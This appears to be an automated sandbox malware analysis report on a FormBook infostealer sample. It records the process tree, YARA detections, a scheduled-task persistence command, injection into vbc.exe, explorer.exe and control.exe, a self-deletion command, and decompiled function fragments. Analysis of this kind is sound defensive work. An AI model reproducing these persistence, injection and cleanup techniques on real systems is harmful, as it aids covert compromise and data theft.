Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: J0OmHIagw8.exe PID: 5816 Parent PID: 5576

General

Start time:	21:03:35
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\J0OmHIagw8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\J0OmHIagw8.exe'
Imagebase:	0xe50000
File size:	582656 bytes
MD5 hash:	92FF500A693078263908C83B4B290481
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 5856 Parent PID: 5816

General

Start time:	21:03:39
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
Imagebase:	0xe0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4552 Parent PID: 5856

General

Start time:	21:03:39
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 4116 Parent PID: 5816

General

Start time:	21:03:40
Start date:	13/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x8a0000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 5800 Parent PID: 5816

General

Start time:	21:03:41
Start date:	13/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x8a0000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5800

General

Start time:	21:03:44
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 3448 Parent PID: 3388

General

Start time:	21:03:56
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xb80000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5864 Parent PID: 3448

General

Start time:	21:04:00
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
Imagebase:	0x200000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6100 Parent PID: 5864

General

Start time:	21:04:01
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: J0OmHIagw8.exe PID: 5816 Parent PID: 5576 J0OmHIagw8.exeCOMMON

Executed Functions

Function 0303BFB8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0303C028
GetCurrentThread.KERNEL32 ref: 0303C065
GetCurrentProcess.KERNEL32 ref: 0303C0A2
GetCurrentThreadId.KERNEL32 ref: 0303C0FB

Strings

tu, xrefs: 0303BFE4

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: tu
API String ID: 2063062207-2986338648
Opcode ID: bc572ac79fe14244d1a5476708c683157e3d389bd1309c577122bbe8e31c2953
Instruction ID: d463b6b1121caa5304bd303c0c3f76303c1d2acaece249b14a7f2b11d15390dc
Opcode Fuzzy Hash: bc572ac79fe14244d1a5476708c683157e3d389bd1309c577122bbe8e31c2953
Instruction Fuzzy Hash: 685175B09016898FDB14CFA9D988BEEBFF5BF4A304F248459E409B7391D7356848CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0303BFC8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0303C028
GetCurrentThread.KERNEL32 ref: 0303C065
GetCurrentProcess.KERNEL32 ref: 0303C0A2
GetCurrentThreadId.KERNEL32 ref: 0303C0FB

Strings

tu, xrefs: 0303BFE4

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: tu
API String ID: 2063062207-2986338648
Opcode ID: 787b70c3cdbb7946496ceef1eafa44a9750bbdd954637c5aed9ff01ccf2e416c
Instruction ID: 2da4a35fe252ef789c3419265d9b978aca7dffdcf9a03ca2cefb8a25ceda6d12
Opcode Fuzzy Hash: 787b70c3cdbb7946496ceef1eafa44a9750bbdd954637c5aed9ff01ccf2e416c
Instruction Fuzzy Hash: 075163B0A016498FDB14CFA9D648BEEBBF5FF49304F248059E409B3390D7356888CB65

Uniqueness

Uniqueness Score: -1.00%

Function 03039CD0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 03039F16

Strings

tu, xrefs: 03039ECF

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: HandleModule
String ID: tu
API String ID: 4139908857-2986338648
Opcode ID: 740dfd2f013f53b8c2c94f5de087162bee93008739600d99357dbc36f400ed9d
Instruction ID: 3680c31d55d880657e49146daae9c9ba9b34ef650d61994184cc0d4a904a5b1d
Opcode Fuzzy Hash: 740dfd2f013f53b8c2c94f5de087162bee93008739600d99357dbc36f400ed9d
Instruction Fuzzy Hash: C4714670A01B058FDB64DF69D4857AABBF9FF89204F04892DD48ADBA40D7B4E805CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03035364, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03035421

Strings

tu, xrefs: 030353A4

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Create
String ID: tu
API String ID: 2289755597-2986338648
Opcode ID: ad8dedb9783483af07bbebb0c0fea357e8cddffc23a4fc43aa356f6344c84ac3
Instruction ID: 74d8bd8eaf6bd0e55b5227b530cc3cf9ee7f77479325fa072d220c735570cc28
Opcode Fuzzy Hash: ad8dedb9783483af07bbebb0c0fea357e8cddffc23a4fc43aa356f6344c84ac3
Instruction Fuzzy Hash: 2941F171C04628CFDB14CFAAC884BCDBBB5BF4A319F248469D408AB251D779694ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 03033E18, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03035421

Strings

tu, xrefs: 030353A4

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Create
String ID: tu
API String ID: 2289755597-2986338648
Opcode ID: 81d7f651e72f35a94c5c2f5d98c1627b69be95925ef3870377b2272b5d63fbb0
Instruction ID: b6a2e6cc98612b89a75ae98838fff1cc587ede374bd711f0595330e13d399852
Opcode Fuzzy Hash: 81d7f651e72f35a94c5c2f5d98c1627b69be95925ef3870377b2272b5d63fbb0
Instruction Fuzzy Hash: 9541E270D04628CBDB24CFAAC8847CDBBF5BF4A308F208469D408AB251D7796949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0303C1E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0303C277

Strings

tu, xrefs: 0303C20F

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: tu
API String ID: 3793708945-2986338648
Opcode ID: c0e099c678e6eac96eb6b03b106aba5908a8aee4223dd3c4f9b5f65febf2edcb
Instruction ID: f410741169013ba9fcdf485f9d9a9d45acb12b0a446e3e5d557c25706848e442
Opcode Fuzzy Hash: c0e099c678e6eac96eb6b03b106aba5908a8aee4223dd3c4f9b5f65febf2edcb
Instruction Fuzzy Hash: EC21F2B59002489FDF10CFA9D884AEEBFF4FF49320F14842AE918A3210C378A954CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0303C1F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0303C277

Strings

tu, xrefs: 0303C20F

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: tu
API String ID: 3793708945-2986338648
Opcode ID: b56be321d09dca9bc5e36c0ef09490ce0d7c685d8e79f28c0e90d30d8bdbedfb
Instruction ID: fa0943ca4f3d1b2d9aeb425dccbfb331d2e38a7ec3c6a2ec0b736b2061f790ad
Opcode Fuzzy Hash: b56be321d09dca9bc5e36c0ef09490ce0d7c685d8e79f28c0e90d30d8bdbedfb
Instruction Fuzzy Hash: 6321E2B59002489FDB10CFAAD984ADEBBF8FB49324F14801AE914A3350D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03039230, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03039F91,00000800,00000000,00000000), ref: 0303A1A2

Strings

tu, xrefs: 0303A157

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: tu
API String ID: 1029625771-2986338648
Opcode ID: f57ab3091f55730cd74b7bc295844870e43e189e91fb07357f4331b4c052de8e
Instruction ID: 1b103d48b128ea67ccf98ee024217a1007b23eadc8288e560c61c842f4d24212
Opcode Fuzzy Hash: f57ab3091f55730cd74b7bc295844870e43e189e91fb07357f4331b4c052de8e
Instruction Fuzzy Hash: 211126B6D013489FDB10CF9AC844ADEFBF8EF89314F05842AE955A7200C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0303A130, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03039F91,00000800,00000000,00000000), ref: 0303A1A2

Strings

tu, xrefs: 0303A157

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: tu
API String ID: 1029625771-2986338648
Opcode ID: cba595efbe92199c6da521916735be642d79a7f9f83d34ce959ff8f9474151a8
Instruction ID: ba8a71ccfac3f2620f29fc9637dbfc78193a1a72b50a8f4e7e0888c212c3665a
Opcode Fuzzy Hash: cba595efbe92199c6da521916735be642d79a7f9f83d34ce959ff8f9474151a8
Instruction Fuzzy Hash: EF1126B2D012488FCB10CFAAD884ADEFBF4AF89314F15852AD855A7200C379A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03039EB0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 03039F16

Strings

tu, xrefs: 03039ECF

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: HandleModule
String ID: tu
API String ID: 4139908857-2986338648
Opcode ID: 124e3c4b0f1544adba820700f749755a70e9f3ad3b5282002492eed719cba666
Instruction ID: 3fd90a8eef65a6e783a2082bad4f0b76b2fd0104a6ee7f50860954add5e3451e
Opcode Fuzzy Hash: 124e3c4b0f1544adba820700f749755a70e9f3ad3b5282002492eed719cba666
Instruction Fuzzy Hash: 461102B6C002498FCB10CF9AC444BDEFBF8AB89324F15842AD419A7600C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0169D4EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238546274.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0007f3823bfcb83ae54a55f1de3f7fdf6e83d557b3386b6823a09bde49dbcda2
Instruction ID: 9d570cd520d11d5a63eb87fa0eddb4b3ba9e2a8a2b76b09b7f123734d6722a19
Opcode Fuzzy Hash: 0007f3823bfcb83ae54a55f1de3f7fdf6e83d557b3386b6823a09bde49dbcda2
Instruction Fuzzy Hash: 772190B1504244EFDF05DF94DDC0B26BF69FB88228F248579E9094B246C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0169D400, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238546274.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ecdfbc22ed0ba16a17559714121f2a514e40a6ac2b98d705a0dcf08ec27e22
Instruction ID: 8764fce92c8326e6c96c74b77ad81f20b1805162391143f713fc56b979f15c64
Opcode Fuzzy Hash: 69ecdfbc22ed0ba16a17559714121f2a514e40a6ac2b98d705a0dcf08ec27e22
Instruction Fuzzy Hash: C7213671504204DFCF05DF94DDC0B5ABB69FB88724F24C579E9054B346C33AE856C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 02F6D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238581685.0000000002F6D000.00000040.00000001.sdmp, Offset: 02F6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d3ce6b488eb6eb3031350555412cf33e1233f79fee0cb9d449161b741764fb
Instruction ID: ce8d372c803a86367ecc50f9392b47289611027bb499119f0464cad9c58af6e6
Opcode Fuzzy Hash: 43d3ce6b488eb6eb3031350555412cf33e1233f79fee0cb9d449161b741764fb
Instruction Fuzzy Hash: E821F575704244EFDB14CF24D9C8B26BB65FB88758F24C969EA0A4B24AC337D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02F6D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238581685.0000000002F6D000.00000040.00000001.sdmp, Offset: 02F6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d9e4929ae921c44810fe667fb3655ad2711928431bb1855c9f2fbd97dc5c9cf
Instruction ID: 9dee8d726c3244249864db7bbe2ca57b81f7d7fd80fde94ca285570d034d9289
Opcode Fuzzy Hash: 9d9e4929ae921c44810fe667fb3655ad2711928431bb1855c9f2fbd97dc5c9cf
Instruction Fuzzy Hash: 7E2192755093C09FCB02CF20D594B15BF71EB46614F28C5EAD9498F697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0169D4E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238546274.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c2d4f6a2d17f220f738be8533c1ca489a9cfe0fbf4c45656e9e51e69fbbc3b
Instruction ID: bbde0c13afa6e0aee1baba844c8c9a2c22d79584da2ffa7f7b2dc969b69996cd
Opcode Fuzzy Hash: 82c2d4f6a2d17f220f738be8533c1ca489a9cfe0fbf4c45656e9e51e69fbbc3b
Instruction Fuzzy Hash: AA11AC76404280CFCF06CF54D9C4B16BF62FB88324F28C6A9D8090B756C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0169D3FB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238546274.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c2d4f6a2d17f220f738be8533c1ca489a9cfe0fbf4c45656e9e51e69fbbc3b
Instruction ID: 5dc64658455155c496889f666c4c1ac1739cfb99eca5bddbe2b13871f761d21f
Opcode Fuzzy Hash: 82c2d4f6a2d17f220f738be8533c1ca489a9cfe0fbf4c45656e9e51e69fbbc3b
Instruction Fuzzy Hash: C111AF76404280CFCF12CF54D9C4B5ABF65FB84720F28C6A9D8080B656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0169D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238546274.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f6b08426a702fdd389d6c6557cd3d3f12a1e450db6b16a907241bfc3b66bfe5
Instruction ID: 4cedb7010c5bd557ff9eb8599a560f00773a207a52936adb3572b9f366e61d28
Opcode Fuzzy Hash: 3f6b08426a702fdd389d6c6557cd3d3f12a1e450db6b16a907241bfc3b66bfe5
Instruction Fuzzy Hash: 5D01F7754083C0ABEB104AA9CC84B7ABB9CEF41274F08856AEE045F382D7799845CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0169D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238546274.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e14e4cd7121c53738159a6baa6a679f482fc2adb42ad5de597f82a35a30d96e
Instruction ID: 069da5edb232d4fd8b8f68a5fb0ff39f7f8f001234ce74f2881684bc81264fe8
Opcode Fuzzy Hash: 7e14e4cd7121c53738159a6baa6a679f482fc2adb42ad5de597f82a35a30d96e
Instruction Fuzzy Hash: 60F06271404384ABEB118E59CC85B76FF9CEB41774F18C56AED085F386D3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E58D5D, Relevance: 2.1, Instructions: 2071COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238210931.0000000000E52000.00000002.00020000.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000000.00000002.238206798.0000000000E50000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7fee4f9eb64fb5ed7d23590548b7ec6711075d52c9a1d404ce44b48508e067f
Instruction ID: 57ace53406b36f01bc2a59b3c482a241fe886528224491610ee0ae041537b37a
Opcode Fuzzy Hash: a7fee4f9eb64fb5ed7d23590548b7ec6711075d52c9a1d404ce44b48508e067f
Instruction Fuzzy Hash: AB03DA5290E7C18FDB034BB85DB52D1BFB19E63219B1E58C7C4C18F0A3E109586ED72A

Uniqueness

Uniqueness Score: -1.00%

Function 0303EEB0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf0a68f0c8710a1542e2b771995879671bf0d95995eb3e9050b6c9acbf74824
Instruction ID: 60d5b2773b0b82ca3485926271767d95a72d50ddf1662d6b06a7979cb662880e
Opcode Fuzzy Hash: 6bf0a68f0c8710a1542e2b771995879671bf0d95995eb3e9050b6c9acbf74824
Instruction Fuzzy Hash: 151292F15137468BE710EF65ED9818A3BB1F746328F904208D2636BAE9D7BC154ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0303CAE4, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c61b401bda8265cce2ebcd93fb981713ab85beaf62234c5ccfb8834fe356b90
Instruction ID: 3a4b6b9f91c8813f560c9229f38f1116e51649f84acdee6eed522f9576fdf934
Opcode Fuzzy Hash: 8c61b401bda8265cce2ebcd93fb981713ab85beaf62234c5ccfb8834fe356b90
Instruction Fuzzy Hash: 1BA15D36E0131A8FCF05DFA5C8445DEBBF6FF8A300B1585AAE905BB260DB71A945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0303EEA2, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238630306.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db282bb0971668a238d6e0434be65cfa7c7c2686fb19605bf38819847917d46
Instruction ID: 798e38ac859a7a7d7185327974b417232fff97e124559d26f56db64f7f1df709
Opcode Fuzzy Hash: 1db282bb0971668a238d6e0434be65cfa7c7c2686fb19605bf38819847917d46
Instruction Fuzzy Hash: FBC12CB19127468BE710EF64EC8818A7BB1FB86328F514309D1636F6D9D7BC244ACF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 5800 Parent PID: 5816 vbc.exeCOMMON

Executed Functions

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, signed char _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _v5;
				signed char _t17;
				void* _t19;
				intOrPtr _t23;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DC0(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t17 = _a12;
				_t12 =  &_a8; // 0x413d52
				_t23 =  *_t12;
				_t19 =  *((intOrPtr*)( *_t29))(_t23, _t17 | 0x00000052, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t19;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182a9
0x004182ad
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041826A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 004182B4

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A
API String ID: 2738559852-4215937652
Opcode ID: dbec16052d9e23fa98051de3ceb3950da3378b057447cba4127a16603d3fec88
Instruction ID: 9ed5283f3577358d6af7a1217b095e451db1f5276505f4157a1ff821f16e7359
Opcode Fuzzy Hash: dbec16052d9e23fa98051de3ceb3950da3378b057447cba4127a16603d3fec88
Instruction Fuzzy Hash: 49C02B7C01000409971963C03A44CE2A30DFFC13143004E0BE44CA0500443088424590

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
